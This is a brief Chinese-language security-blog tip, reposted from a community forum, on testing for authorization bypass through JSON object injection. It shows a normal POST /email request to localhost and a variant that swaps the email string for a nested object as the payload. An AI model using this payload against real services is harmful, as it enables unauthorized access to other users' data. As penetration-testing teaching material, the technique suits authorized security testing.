越权测试小技巧:利用对象注入(Object Injection)

越权测试小技巧:利用对象注入(Object Injection)

POST /email
Host: localhost
Content-Type: application/json

{“email”:”guest@example.com“}

——————-
POST /email
Host: localhost
Content-Type: application/json

{“email”:{“email”:”1″}}

参考 Object Injection to SQL Injection

#火线Zone Tips#
图片[1]-越权测试小技巧:利用对象注入(Object Injection)-安全小天地
图片[2]-越权测试小技巧:利用对象注入(Object Injection)-安全小天地


本文迁移自知识星球“火线Zone”

文字来源于- 火线 Zone-云安全社区,安全小天地只做文章分享,如有侵权,请联系站长删除


「渗透云记」公众号里主要记录我每天的所思所想,我会坚持更新质量不错的文章,感兴趣的小伙伴可以扫描下方二维码,谢谢支持! 安全小天地 - 公众号 - 渗透云记
© 版权声明
THE END
喜欢就支持一下吧
点赞8 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容